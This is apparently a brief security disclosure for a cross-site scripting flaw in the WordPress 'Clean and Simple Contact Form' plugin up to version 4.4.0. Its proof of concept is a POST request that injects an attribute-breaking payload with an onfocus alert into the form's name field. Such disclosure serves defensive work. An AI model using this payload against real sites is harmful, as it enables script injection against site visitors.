Author : Ajin Abraham Author Website: http://opensecurity.in Affected Product: WordPress Clean and Simple Contact Form Affected Version: <= 4.4.0 Vendor: Meg Nicholas Vendor URL: http://www.pluginmirror.com/plugins/clean-and-simple-contact-form-by-meg-nicholas/ WP Plugin URL: https://wordpress.org/plugins/clean-and-simple-contact-form-by-meg-nicholas/ PoC: Make a POST request to the page containing the contact form generated by "Clean and Simple Contact Form" with the POST DATA as cscf[name]=" onfocus=alert(1) autofocus x=" POST http://localhost/contact-us/ cscf[name]=" onfocus=alert(1) autofocus x=" *Regards,Ajin*